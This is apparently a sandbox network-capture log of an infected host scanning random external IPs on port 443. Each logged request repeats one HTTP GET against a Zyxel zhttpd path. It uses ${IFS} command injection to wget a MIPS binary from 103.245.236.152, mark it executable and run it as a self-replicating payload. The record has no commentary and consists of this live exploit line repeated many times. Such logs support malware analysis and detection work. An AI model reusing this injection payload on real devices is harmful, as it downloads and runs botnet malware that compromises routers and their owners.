                                          Jan 14, 2024 15:46:10.866946936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2945192.168.2.23598102.174.235.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866951942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2946192.168.2.235319098.158.85.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.866997957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2947192.168.2.2336978201.187.254.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867031097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2948192.168.2.2339114130.92.225.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867050886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2949192.168.2.2352942191.235.167.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867052078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2950192.168.2.2338248165.23.205.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867069006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2951192.168.2.2337108217.251.227.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867100954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2952192.168.2.235979645.175.108.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867137909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2953192.168.2.23451805.87.187.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867160082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2954192.168.2.235765052.82.125.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867176056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2955192.168.2.2334306123.38.75.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867211103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2956192.168.2.2359952154.246.152.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867229939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2957192.168.2.233642459.100.187.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867249966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2958192.168.2.2344120198.243.240.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867284060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2959192.168.2.2349264195.223.100.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867316008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2960192.168.2.2333214146.35.32.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867347002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2961192.168.2.23516341.24.2.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867352962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2962192.168.2.234726694.102.65.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867372990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2963192.168.2.2340544194.144.33.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867405891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2964192.168.2.2340336169.26.215.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867410898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2965192.168.2.234384476.196.73.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867456913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2966192.168.2.2335380197.82.49.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867468119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2967192.168.2.2347034147.42.39.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867487907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2968192.168.2.23416985.251.121.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867523909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2969192.168.2.2349642209.52.13.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867556095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2970192.168.2.235902688.86.165.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867573023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2971192.168.2.233927281.233.102.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867613077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2972192.168.2.2353772112.28.84.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867662907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2973192.168.2.233444278.90.0.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867675066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2974192.168.2.2341112122.144.97.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867676020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2975192.168.2.23451384.127.158.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867723942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2976192.168.2.2359598138.208.80.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867743015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2977192.168.2.235062457.168.145.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867818117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2978192.168.2.2358114159.157.32.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867825031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2979192.168.2.2335068162.155.142.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867849112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2980192.168.2.2347662122.238.224.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867866039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2981192.168.2.2358376113.168.208.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867904902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2982192.168.2.235051278.212.15.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867939949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2983192.168.2.2338838134.146.164.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867970943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2984192.168.2.2338836161.40.14.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.867970943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2985192.168.2.2338998195.22.98.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868012905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2986192.168.2.2350328145.219.195.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868019104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2987192.168.2.2360280158.250.10.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868047953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2988192.168.2.2348364126.103.4.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868062019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2989192.168.2.234943613.123.24.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868082047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2990192.168.2.2347510142.155.8.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868112087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2991192.168.2.2355120180.234.205.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868129969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2992192.168.2.235509025.207.252.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868139029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2993192.168.2.235883657.194.134.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868161917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2994192.168.2.2355596188.163.30.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868197918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2995192.168.2.2351230166.16.151.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868216038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2996192.168.2.234974634.27.177.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868241072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2997192.168.2.235569275.47.0.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868248940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2998192.168.2.2350242129.23.62.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868282080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2999192.168.2.235362452.43.60.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868288040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3000192.168.2.234191018.238.127.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868362904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3001192.168.2.235518867.49.63.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868362904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3002192.168.2.234857286.130.168.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868362904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3003192.168.2.235096272.15.229.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868381977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3004192.168.2.2356342119.111.238.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868405104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3005192.168.2.235914485.73.246.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868454933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3006192.168.2.234955253.136.14.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:10.868488073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3007192.168.2.233295650.88.252.106443
                                          TimestampBytes transferredDirectionData
